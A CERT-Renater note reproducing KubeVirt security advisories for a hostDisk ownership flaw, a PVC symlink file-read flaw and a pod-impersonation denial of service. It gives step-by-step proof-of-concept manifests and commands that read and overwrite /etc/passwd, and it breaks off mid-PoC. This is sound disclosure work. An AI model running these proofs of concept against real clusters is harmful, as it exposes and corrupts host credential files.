=====================================================================

                            CERT-Renater

                Note d'Information No. 2025/VULN796
_____________________________________________________________________

DATE                : 14/11/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running KubeVirt.

=====================================================================
https://github.com/kubevirt/kubevirt/security/advisories/GHSA-46xp-26xh-hpqh
https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qw6q-3pgr-5cwq
https://github.com/kubevirt/kubevirt/security/advisories/GHSA-9m94-w2vq-hcf9
https://github.com/kubevirt/kubevirt/security/advisories/GHSA-2r4r-5x78-mvqf
https://github.com/kubevirt/kubevirt/security/advisories/GHSA-38jw-g2qx-4286
https://github.com/kubevirt/kubevirt/security/advisories/GHSA-7xgm-5prm-v5gc
https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp
_____________________________________________________________________


Arbitrary Host File Read and Write
High
stu-gott published GHSA-46xp-26xh-hpqh Nov 6, 2025

Package
No package listed

Affected versions
1.5.0

Patched versions
None


Description

Summary

The hostDisk feature in KubeVirt allows mounting a host file or
directory owned by the user with UID 107 into a VM. However, the
implementation of this feature, and more specifically of the
DiskOrCreate option which creates the file if it doesn't exist, has a
logic bug that allows an attacker to read and write arbitrary files
owned by more privileged users on the host system.


Details

The hostDisk feature gate in KubeVirt allows mounting a QEMU RAW image
directly from the host into a VM. While similar features, such as
mounting disk images from a PVC, enforce ownership-based restrictions
(e.g., only allowing files owned by a specific UID), this mechanism
can be subverted. For a RAW disk image to be readable by the QEMU
process running within the virt-launcher pod, it must be owned by the
user with UID 107. If this ownership check is considered a security
barrier, it can be bypassed. In addition, the ownership of the host
files mounted via this feature is changed to the user with UID 107.

The above is due to a logic bug in the virt-handler component, which
prepares the volumes (and the data inside them) that are going to be
mounted in the virt-launcher pod and subsequently consumed by the VM,
and sets their permissions. It is triggered when one tries to mount a
host file or directory using the DiskOrCreate option. The relevant
code is as follows:

// pkg/host-disk/host-disk.go

func (hdc DiskImgCreator) Create(vmi *v1.VirtualMachineInstance) error {
	for _, volume := range vmi.Spec.Volumes {
		if hostDisk := volume.VolumeSource.HostDisk; shouldMountHostDisk(hostDisk) {
			if err := hdc.mountHostDiskAndSetOwnership(vmi, volume.Name, hostDisk); err != nil {
				return err
			}
		}
	}
	return nil
}

func shouldMountHostDisk(hostDisk *v1.HostDisk) bool {
	return hostDisk != nil && hostDisk.Type == v1.HostDiskExistsOrCreate && hostDisk.Path != ""
}

func (hdc *DiskImgCreator) mountHostDiskAndSetOwnership(vmi *v1.VirtualMachineInstance, volumeName string, hostDisk *v1.HostDisk) error {
	diskPath := GetMountedHostDiskPathFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName, hostDisk.Path)
	diskDir := GetMountedHostDiskDirFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName)
	fileExists, err := ephemeraldiskutils.FileExists(diskPath)
	if err != nil {
		return err
	}
	if !fileExists {
		if err := hdc.handleRequestedSizeAndCreateSparseRaw(vmi, diskDir, diskPath, hostDisk); err != nil {
			return err
		}
	}
	// Change file ownership to the qemu user.
	if err := ephemeraldiskutils.DefaultOwnershipManager.UnsafeSetFileOwnership(diskPath); err != nil {
		log.Log.Reason(err).Errorf("Couldn't set Ownership on %s: %v", diskPath, err)
		return err
	}
	return nil
}

The root cause lies in the fact that if the file specified by the
user does not exist, it is created by the
handleRequestedSizeAndCreateSparseRaw function. However, this
function does not explicitly set file ownership or permissions. As
a result, the logic in mountHostDiskAndSetOwnership unconditionally
proceeds to the branch marked with // Change file ownership to the
qemu user, assuming ownership should be applied. This logic fails to
account for the scenario where the file already exists and may be
owned by a more privileged user.
In such cases, changing file ownership without validating the file's
origin introduces a security risk: it can unintentionally grant
access to sensitive host files, compromising their integrity and
confidentiality. It may also enable an External API Attacker to
disrupt system availability.
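
For illustration only, the following standalone Go sketch (not
KubeVirt's actual code; the helper name prepareHostDisk and the exact
UID handling are assumptions) shows a more defensive variant of this
logic: ownership is only changed for a file that this code path has
just created, and a pre-existing file not already owned by the qemu
user is rejected instead of being chown'ed:

package main

import (
	"fmt"
	"os"
	"syscall"
)

const qemuUID, qemuGID = 107, 107 // UID/GID of the qemu user in virt-launcher

// prepareHostDisk is a hypothetical, hardened variant of the vulnerable
// logic: it never changes the ownership of a pre-existing file and only
// chowns a sparse RAW image that it created itself (Linux-specific).
func prepareHostDisk(diskPath string, sizeBytes int64) error {
	if info, err := os.Lstat(diskPath); err == nil {
		// The file already exists: never chown it. Only accept it if it
		// is a regular file already owned by the expected user.
		st, ok := info.Sys().(*syscall.Stat_t)
		if !ok || !info.Mode().IsRegular() || int(st.Uid) != qemuUID {
			return fmt.Errorf("refusing pre-existing host disk %q not owned by uid %d", diskPath, qemuUID)
		}
		return nil
	} else if !os.IsNotExist(err) {
		return err
	}
	// The file does not exist: create it exclusively so that a file
	// created concurrently by someone else cannot be silently adopted,
	// then size it as a sparse RAW image and hand it over to qemu.
	f, err := os.OpenFile(diskPath, os.O_CREATE|os.O_EXCL|os.O_WRONLY, 0o640)
	if err != nil {
		return err
	}
	defer f.Close()
	if err := f.Truncate(sizeBytes); err != nil {
		return err
	}
	return os.Chown(diskPath, qemuUID, qemuGID)
}

func main() {
	if err := prepareHostDisk("/tmp/example-disk.img", 1<<30); err != nil {
		fmt.Println("error:", err)
	}
}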


PoC

To demonstrate this vulnerability, the hostDisk feature gate should
be enabled when deploying the KubeVirt stack.

# kubevirt-cr.yaml
apiVersion: kubevirt.io/v1
kind: KubeVirt
metadata:
  name: kubevirt
  namespace: kubevirt
spec:
  certificateRotateStrategy: {}
  configuration:
    developerConfiguration:
      featureGates:
        -  HostDisk
  customizeComponents: {}
  imagePullPolicy: IfNotPresent
  workloadUpdateStrategy: {}

Initially, if one tries to create a VM and mount /etc/passwd from the
host using the Disk option which assumes that the file already
exists, the following error is returned:

# arbitrary-host-read-write.yaml
apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
  name: arbitrary-host-read-write
spec:
  runStrategy: Always
  template:
    metadata:
      labels:
        kubevirt.io/size: small
        kubevirt.io/domain: arbitrary-host-read-write
    spec:
      domain:
        devices:
          disks:
            - name: containerdisk
              disk:
                bus: virtio
            - name: cloudinitdisk
              disk:
                bus: virtio
            - name: host-disk
              disk:
                bus: virtio
          interfaces:
          - name: default
            masquerade: {}
        resources:
          requests:
            memory: 64M
      networks:
      - name: default
        pod: {}
      volumes:
        - name: containerdisk
          containerDisk:
            image: quay.io/kubevirt/cirros-container-disk-demo
        - name: cloudinitdisk
          cloudInitNoCloud:
            userDataBase64: SGkuXG4=
        - name: host-disk
          hostDisk:
            path: /etc/passwd
            type: Disk

# Deploy the above VM manifest
operator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml
# Observe the deployment status
operator@minikube:~$ kubectl get vm
NAME                        AGE     STATUS             READY
arbitrary-host-read-write   7m55s   CrashLoopBackOff   False
# Inspect the reason for the `CrashLoopBackOff`
operator@minikube:~$ kubectl get vm arbitrary-host-read-write  -o jsonpath='{.status.conditions[3].message}'
server error. command SyncVMI failed: "LibvirtError(Code=1, Domain=10, Message='internal error: process exited while connecting to monitor: 2025-05-20T20:14:01.546609Z qemu-kvm: -blockdev {\"driver\":\"file\",\"filename\":\"/var/run/kubevirt-private/vmi-disks/host-disk/passwd\",\"aio\":\"native\",\"node-name\":\"libvirt-1-storage\",\"read-only\":false,\"discard\":\"unmap\",\"cache\":{\"direct\":true,\"no-flush\":false}}: Could not open '/var/run/kubevirt-private/vmi-disks/host-disk/passwd': Permission denied')"

The host's /etc/passwd file's owner and group are 0:0 (root:root); hence, when one tries to deploy the above VirtualMachine definition, a Permission denied error is returned because the file is not owned by the user with UID 107 (qemu):

# Inspect the ownership of the host's mounted `/etc/passwd` file
# within the `virt-launcher` pod responsible for the VM
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-host-read-write-tjjkt -- ls -al /var/run/kubevirt-private/vmi-disks/host-disk/passwd
-rw-r--r--. 1 root root 1276 Jan 13 17:10 /var/run/kubevirt-private/vmi-disks/host-disk/passwd

However, if one uses the DiskOrCreate option, the file's ownership is
silently changed to 107:107 (qemu:qemu) before the VM is started,
which allows the latter to boot and then read and modify the file.

...
hostDisk:
            capacity: 1Gi
            path: /etc/passwd
            type: DiskOrCreate

# Apply the modified manifest
operator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml
# Observe the deployment status
operator@minikube:~$ kubectl get vm
NAME                        AGE     STATUS             READY
arbitrary-host-read-write   7m55s   Running   False
# Initiate a console connection to the running VM
operator@minikube: virtctl console arbitrary-host-read-write
...

# Within the VM arbitrary-host-read-write, inspect the present block
# devices and their contents

root@arbitrary-host-read-write:~$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
vda     253:0    0   44M  0 disk
|-vda1  253:1    0   35M  0 part /
`-vda15 253:15   0    8M  0 part
vdb     253:16   0    1M  0 disk
vdc     253:32   0  1.5K  0 disk
root@arbitrary-host-read-write:~$ cat /dev/vdc
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin
systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
docker:x:1000:999:,,,:/home/docker:/bin/bash
# Write into the block device backed by the host's `/etc/passwd` file
root@arbitrary-host-read-write:~$ echo "Quarkslab" | tee -a /dev/vdc

If one inspects the host's /etc/passwd file, they will see that its
content has changed alongside its ownership:

# Inspect the contents of the file
operator@minikube:~$ cat /etc/passwd
Quarkslab
:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin
systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
docker:x:1000:999:,,,:/home/docker:/bin/bash
# Inspect the permissions of the file
operator@minikube:~$ ls -al /etc/passwd
-rw-r--r--. 1 107 systemd-resolve 1276 May 20 20:35 /etc/passwd
# Test the integrity of the system
operator@minikube: $sudo su
sudo: unknown user root
sudo: error initializing audit plugin sudoers_audit


Impact

Arbitrary read and write of host files: this vulnerability can
unintentionally grant access to sensitive host files, compromising
their integrity and confidentiality.


Severity
High

CVE ID
CVE-2025-64324

Weaknesses
Weakness CWE-123
Weakness CWE-200
Weakness CWE-732


Credits

    @mihailkirov (Finder)
    @Faeris95 (Finder)
    @jean-edouard (Remediation developer)

_____________________________________________________________________

Arbitrary Container File Read
Moderate
stu-gott published GHSA-qw6q-3pgr-5cwq Nov 6, 2025

Package
No package listed

Affected versions
1.5.0

Patched versions
None


Description

Summary

Mounting a user-controlled PVC disk within a VM allows an attacker
to read any file present in the virt-launcher pod. This is due to
erroneous handling of symlinks defined within a PVC.


Details

A vulnerability was discovered that allows a VM to read arbitrary
files from the virt-launcher pod's file system. This issue stems
from improper symlink handling when mounting PVC disks into a VM.
Specifically, if a malicious user has full or partial control over
the contents of a PVC, they can create a symbolic link that points
to a file within the virt-launcher pod's file system. Since libvirt
can treat regular files as block devices, any file on the pod's
file system that is symlinked in this way can be mounted into the
VM and subsequently read.

Although a security mechanism exists where VMs are executed as an
unprivileged user with UID 107 inside the virt-launcher container,
limiting the scope of accessible resources, this restriction is
bypassed due to a second vulnerability (reported separately). The
latter causes the ownership of any file intended for mounting to
be changed to the unprivileged user with UID 107 prior to
mounting. As a result, an attacker can gain access to and read
arbitrary files located within the virt-launcher pod's file
system or on a mounted PVC from within the guest VM.
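
As an illustration of the kind of check that is missing, the
following standalone Go sketch (assumed helper name, not KubeVirt
code) resolves a candidate disk.img path and rejects it if symlink
resolution escapes the PVC mount directory it is supposed to live in:

package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// resolveDiskWithinMount resolves every symlink in diskPath and only
// accepts the result if it still lives under mountDir, so a symlink
// planted inside a PVC cannot point at files of the virt-launcher pod.
func resolveDiskWithinMount(mountDir, diskPath string) (string, error) {
	resolvedMount, err := filepath.EvalSymlinks(mountDir)
	if err != nil {
		return "", err
	}
	resolvedDisk, err := filepath.EvalSymlinks(diskPath)
	if err != nil {
		return "", err
	}
	rel, err := filepath.Rel(resolvedMount, resolvedDisk)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", fmt.Errorf("disk image %q escapes PVC mount %q", diskPath, mountDir)
	}
	return resolvedDisk, nil
}

func main() {
	resolved, err := resolveDiskWithinMount(
		"/var/run/kubevirt-private/vmi-disks/pvc-1",
		"/var/run/kubevirt-private/vmi-disks/pvc-1/disk.img")
	fmt.Println(resolved, err)
}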


PoC

Consider that an attacker has control over the contents of two
PVCs (e.g., from within a container) and creates the following
symlinks:

# The YAML definition of two PVCs that the attacker has access to
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: pvc-arbitrary-container-read-1
spec:
  accessModes:
    - ReadWriteMany # suitable for migration (:= RWX)
  resources:
    requests:
      storage: 500Mi
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: pvc-arbitrary-container-read-2
spec:
  accessModes:
    - ReadWriteMany # suitable for migration (:= RWX)
  resources:
    requests:
      storage: 500Mi
---
# The attacker-controlled container used to create the symlinks in the above PVCs
apiVersion: v1
kind: Pod
metadata:
  name: dual-pvc-pod
spec:
  containers:
  - name: app-container
    image: alpine
    command: ["/some-vulnerable-app"]
    volumeMounts:
    - name: pvc-volume-one
      mountPath: /mnt/data1
    - name: pvc-volume-two
      mountPath: /mnt/data2
  volumes:
  - name: pvc-volume-one
    persistentVolumeClaim:
      claimName: pvc-arbitrary-container-read-1
  - name: pvc-volume-two
    persistentVolumeClaim:
      claimName: pvc-arbitrary-container-read-2

By default, Minikube's storage controller (hostpath-provisioner) will
allocate the claim as a directory on the host node (HostPath). Once
the above Kubernetes resources are created, the user can create the
symlinks within the PVC as follows:

# Using the `pvc-arbitrary-container-read-1` PVC we want to read the
# default XML configuration generated by `virt-launcher` for `libvirt`.
# Hence, the attacker has to create a symlink including the name of
# the future VM which will be created using this configuration.

attacker@dual-pvc-pod:/mnt/data1 $ln -s ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml disk.img
attacker@dual-pvc-pod:/mnt/data1 $ls -l
lrwxrwxrwx    1 root     root            85 May 19 22:24 disk.img -> ../../../../../../../../var/run/libvirt/qemu/run/default_arbitrary-container-read.xml

# With the `pvc-arbitrary-container-read-2` we want to read the `/etc/passwd` of the `virt-launcher` container which will launch the future VM
attacker@dual-pvc-pod:/mnt/data2 $ln -s ../../../../../../../../etc/passwd disk.img 
attacker@dual-pvc-pod:/mnt/data2 $ls -l
lrwxrwxrwx    1 root     root            34 May 19 22:26 disk.img -> ../../../../../../../../etc/passwd

Of course, these links could be dangling, as the target files,
especially default_arbitrary-container-read.xml, may not exist on the
dual-pvc-pod pod's file system. The attacker then deploys the
following VM:

# arbitrary-container-read.yaml
apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
  name: arbitrary-container-read
spec:
  runStrategy: Always
  template:
    metadata:
      labels:
        kubevirt.io/size: small
        kubevirt.io/domain: arbitrary-container-read
    spec:
      domain:
        devices:
          disks:
            - name: containerdisk
              disk:
                bus: virtio
            - name: pvc-1
              disk:
                bus: virtio
            - name: pvc-2
              disk:
                bus: virtio
            - name: cloudinitdisk
              disk:
                bus: virtio
          interfaces:
          - name: default
            masquerade: {}
        resources:
          requests:
            memory: 64M
      networks:
      - name: default
        pod: {}
      volumes:
        - name: containerdisk
          containerDisk:
            image: quay.io/kubevirt/cirros-container-disk-demo
        - name: pvc-1
          persistentVolumeClaim:
           claimName: pvc-arbitrary-container-read-1
        - name: pvc-2
          persistentVolumeClaim:
           claimName: pvc-arbitrary-container-read-2
        - name: cloudinitdisk
          cloudInitNoCloud:
            userDataBase64: SGkuXG4=

The two PVCs will be mounted as volumes in "filesystem" mode.

From the documentation of the different volume modes, one can
infer that if the backing disk.img is not owned by the
unprivileged user with UID 107, the VM should fail to mount it. In
addition, this backing file is expected to be in RAW format.
While this format can contain pretty much anything, we consider
that being able to mount a file from the file system of
virt-launcher is not the expected behaviour. The following
demonstrates that, after applying the VM manifest, the guest can
read the /etc/passwd and default_arbitrary-container-read.xml files
from the virt-launcher pod's file system:

# Deploy the VM manifest
operator@minikube:~$ kubectl apply -f arbitrary-container-read.yaml
virtualmachine.kubevirt.io/arbitrary-container-read created
# Observe the deployment status
operator@minikube:~$ kubectl get vmis
NAME                       AGE   PHASE     IP           NODENAME       READY
arbitrary-container-read   80s   Running   10.244.1.9   minikube-m02   True
# Initiate a console connection to the running VM
operator@minikube:~$ virtctl console arbitrary-container-read

# Within the `arbitrary-container-read` VM, inspect the available
# block devices
root@arbitrary-container-read:~$ lsblk
NAME    MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
vda     253:0    0   44M  0 disk
|-vda1  253:1    0   35M  0 part /
`-vda15 253:15   0    8M  0 part
vdb     253:16   0   20K  0 disk
vdc     253:32   0  512B  0 disk
vdd     253:48   0    1M  0 disk
# Inspect the mounted /etc/passwd of the `virt-launcher` pod
root@arbitrary-container-read:~$ cat /dev/vdc
qemu:x:107:107:user:/home/qemu:/bin/bash
root:x:0:0:root:/root:/bin/bash
# Inspect the mounted `default_arbitrary-container-read.xml` of the `virt-launcher` pod
root@arbitrary-container-read:~$ cat /dev/vdb | head -n 20
<!--
WARNING: THIS IS AN AUTO-GENERATED FILE. CHANGES TO IT ARE LIKELY TO BE
OVERWRITTEN AND LOST. Changes to this xml configuration should be made
using:
  virsh edit default_arbitrary-container-read
or other application using the libvirt API.
-->
<domstatus state='paused' reason='starting up' pid='80'>
  <monitor path='/var/run/kubevirt-private/libvirt/qemu/lib/domain-1-default_arbitrary-co/monitor.sock' type='unix'/>
  <vcpus>
  </vcpus>
  <qemuCaps>
    <flag name='hda-duplex'/>
    <flag name='piix3-usb-uhci'/>
    <flag name='piix4-usb-uhci'/>
    <flag name='usb-ehci'/>
    <flag name='ich9-usb-ehci1'/>
    <flag name='usb-redir'/>
    <flag name='usb-hub'/>
    <flag name='ich9-ahci'/>

operator@minikube:~$ kubectl get pods
NAME                                           READY   STATUS    RESTARTS   AGE
dual-pvc-pod                                   1/1     Running   0          20m
virt-launcher-arbitrary-container-read-tn4mb   3/3     Running   0          15m
# Inspect the contents of the `/etc/passwd` file of the `virt-launcher` pod attached to the VM
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- cat /etc/passwd
qemu:x:107:107:user:/home/qemu:/bin/bash
root:x:0:0:root:/root:/bin/bash 

# Inspect the ownership of the `/etc/passwd` file of the `virt-launcher` pod
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-container-read-tn4mb -- ls -al /etc/passwd
-rw-r--r--. 1 qemu qemu 73 Jan  1  1970 /etc/passwd


Impact

This vulnerability breaches the container-to-VM isolation boundary,
compromising the confidentiality of storage data.

Severity
Moderate
6.5/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE ID
CVE-2025-64433

Weaknesses
Weakness CWE-22
Weakness CWE-200


Credits

    @mihailkirov (Finder)
    @Faeris95 (Finder)

_____________________________________________________________________

VMI Denial-of-Service (DoS) Using Pod Impersonation
Moderate
stu-gott published GHSA-9m94-w2vq-hcf9 Nov 6, 2025

Package
No package listed

Affected versions
1.5.0

Patched versions
None


Description

Summary

A logic flaw in the virt-controller allows an attacker to disrupt
control of a running VMI by creating a pod with the same labels
as the legitimate virt-launcher pod associated with the VMI. This
can mislead the virt-controller into associating the fake pod with
the VMI, resulting in incorrect status updates and potentially
causing a DoS (Denial-of-Service).


Details

A vulnerability has been identified in the logic responsible for
reconciling the state of a VMI. Specifically, it is possible to
associate a malicious attacker-controlled pod with an existing VMI
running within the same namespace as the pod, thereby replacing
the legitimate virt-launcher pod associated with the VMI.

The virt-launcher pod is critical for enforcing the isolation
mechanisms applied to the QEMU process that runs the virtual
machine. It also serves, along with virt-handler, as a management
interface that allows cluster users, operators, or administrators
to control the lifecycle of the VMI (e.g., starting, stopping,
or migrating it).

When virt-controller receives a notification about a change in a
VMI's state, it attempts to identify the corresponding
virt-launcher pod. This is necessary in several scenarios,
including:

    - When hardware devices are requested to be hotplugged into the
      VMI, they must also be hotplugged into the associated
      virt-launcher pod.
    - When additional RAM is requested, this may require updating
      the virt-launcher pod's cgroups.
    - When additional CPU resources are added, this may also
      necessitate modifying the virt-launcher pod's cgroups.
    - When the VMI is scheduled to migrate to another node.

The core issue lies in the implementation of the GetControllerOf
function, which is responsible for determining the controller
(i.e., owning resource) of a given pod. In its current form, this
logic can be manipulated, allowing an attacker to substitute a
rogue pod in place of the legitimate virt-launcher, thereby
compromising the VMI's integrity and control mechanisms.

//pkg/controller/controller.go

func CurrentVMIPod(vmi *v1.VirtualMachineInstance, podIndexer cache.Indexer) (*k8sv1.Pod, error) {
	// Get all pods from the VMI namespace which contain the label "kubevirt.io"
	objs, err := podIndexer.ByIndex(cache.NamespaceIndex, vmi.Namespace)
	if err != nil {
		return nil, err
	}
	pods := []*k8sv1.Pod{}
	for _, obj := range objs {
		pod := obj.(*k8sv1.Pod)
		pods = append(pods, pod)
	}

	var curPod *k8sv1.Pod = nil
	for _, pod := range pods {
		if !IsControlledBy(pod, vmi) {
			continue
		}

		if vmi.Status.NodeName != "" &&
			vmi.Status.NodeName != pod.Spec.NodeName {
			// This pod isn't scheduled to the current node.
			// This can occur during the initial migration phases when
			// a new target node is being prepared for the VMI.
			continue
		}
		// take the most recently created pod
		if curPod == nil || curPod.CreationTimestamp.Before(&pod.CreationTimestamp) {
			curPod = pod
		}
	}
	return curPod, nil
}

// pkg/controller/controller_ref.go


// GetControllerOf returns the controllerRef if controllee has a controller,
// otherwise returns nil.
func GetControllerOf(pod *k8sv1.Pod) *metav1.OwnerReference {
	controllerRef := metav1.GetControllerOf(pod)
	if controllerRef != nil {
		return controllerRef
	}
	// We may find pods that are only using CreatedByLabel and not set with an OwnerReference
	if createdBy := pod.Labels[virtv1.CreatedByLabel]; len(createdBy) > 0 {
		name := pod.Annotations[virtv1.DomainAnnotation]
		uid := types.UID(createdBy)
		vmi := virtv1.NewVMI(name, uid)
		return metav1.NewControllerRef(vmi, virtv1.VirtualMachineInstanceGroupVersionKind)
	}
	return nil
}

func IsControlledBy(pod *k8sv1.Pod, vmi *virtv1.VirtualMachineInstance) bool {
	if controllerRef := GetControllerOf(pod); controllerRef != nil {
		return controllerRef.UID == vmi.UID
	}
	return false
}

The current logic assumes that a virt-launcher pod associated with a
VMI may not always have a controllerRef. In such cases, the
controller falls back to inspecting the pod's labels. Specifically,
it evaluates the kubevirt.io/created-by label, which is expected to
match the UID of the VMI triggering the reconciliation loop. If
multiple pods are found that could be associated with the same VMI,
the virt-controller selects the most recently created one.

This logic appears to be designed with migration scenarios in mind,
where it is expected that two virt-launcher pods might temporarily
coexist for the same VMI: one for the migration source and one for
the migration target node. However, a scenario was not identified
in which a legitimate virt-launcher pod lacks a controllerRef and
relies solely on labels (such as kubevirt.io/created-by) to
indicate its association with a VMI.

This fallback behaviour introduces a security risk. If an attacker
is able to obtain the UID of a running VMI and create a pod within
the same namespace, they can assign it labels that mimic those of
a legitimate virt-launcher pod. As a result, the CurrentVMIPod
function could mistakenly return the attacker-controlled pod
instead of the authentic one.
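
For comparison, the following standalone Go sketch (simplified
stand-in types, not the actual Kubernetes/KubeVirt API) shows a
stricter association check that only trusts a real controller
OwnerReference and never falls back to attacker-controllable labels:

package main

import "fmt"

// Simplified stand-ins for the Kubernetes/KubeVirt types used above.
type OwnerReference struct {
	Kind       string
	UID        string
	Controller *bool
}

type Pod struct {
	OwnerReferences []OwnerReference
	Labels          map[string]string
}

type VMI struct{ UID string }

// isControlledByStrict only accepts pods whose controller OwnerReference
// points at the VMI; a user-supplied kubevirt.io/created-by label is
// never enough to associate a pod with the VMI.
func isControlledByStrict(pod *Pod, vmi *VMI) bool {
	for _, ref := range pod.OwnerReferences {
		if ref.Controller != nil && *ref.Controller &&
			ref.Kind == "VirtualMachineInstance" && ref.UID == vmi.UID {
			return true
		}
	}
	return false
}

func main() {
	isController := true
	vmi := &VMI{UID: "18afb8bf-70c4-498b-aece-35804c9a0d11"}
	legit := &Pod{OwnerReferences: []OwnerReference{{
		Kind: "VirtualMachineInstance", UID: vmi.UID, Controller: &isController}}}
	fake := &Pod{Labels: map[string]string{"kubevirt.io/created-by": vmi.UID}}
	fmt.Println(isControlledByStrict(legit, vmi)) // true
	fmt.Println(isControlledByStrict(fake, vmi))  // false
}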

This vulnerability has at least two serious consequences:

    The attacker could disrupt or seize control over the VMI's
lifecycle operations.
    The attacker could potentially influence the VMI's migration
target node, bypassing node-level security constraints such as
nodeSelector or nodeAffinity, which are typically used to enforce
workload placement policies.


PoC

Consider the following VMI definition:

apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  name: launcher-label-confusion
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio
      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=

# Deploy the launcher-label-confusion VMI
operator@minikube:~$ kubectl apply -f launcher-confusion-labels.yaml
# Get the UID of the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.metadata.uid}'
18afb8bf-70c4-498b-aece-35804c9a0d11
# Find the UID of the `virt-launcher` pods associated with the VMI (ActivePods)
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube"}

The UID of the VMI can also be found as an argument to the
container in the virt-launcher pod:

# Inspect the `virt-launcher` pod associated with the VMI and the
# --uid CLI argument with which it was launched
operator@minikube:~$ kubectl get pods virt-launcher-launcher-label-confusion-bdkwj -o jsonpath='{.spec.containers[0]}' | jq .
{
  "command": [
    "/usr/bin/virt-launcher-monitor",
    ...
    "--uid",
    "18afb8bf-70c4-498b-aece-35804c9a0d11", 
    "--namespace",
    "default",
    ...

Consider the following attacker-controlled pod, which is associated
with the VMI using the UID defined in the kubevirt.io/created-by label:

apiVersion: v1
kind: Pod
metadata:
  name: fake-launcher
  labels:
    kubevirt.io: intruder # this is the label used by the virt-controller to identify pods associated with KubeVirt components
    kubevirt.io/created-by: 18afb8bf-70c4-498b-aece-35804c9a0d11 # this is the UID of the launcher-label-confusion VMI which is going to be taken into account if there is no ownerReference. This is the case for regular pods
    kubevirt.io/domain: migration
spec:
  restartPolicy: Never
  containers:
    - name: alpine
      image: alpine
      command: [ "sleep", "3600" ]

operator@minikube:~$ kubectl apply -f fake-launcher.yaml
# Get the UID of the `fake-launcher` pod
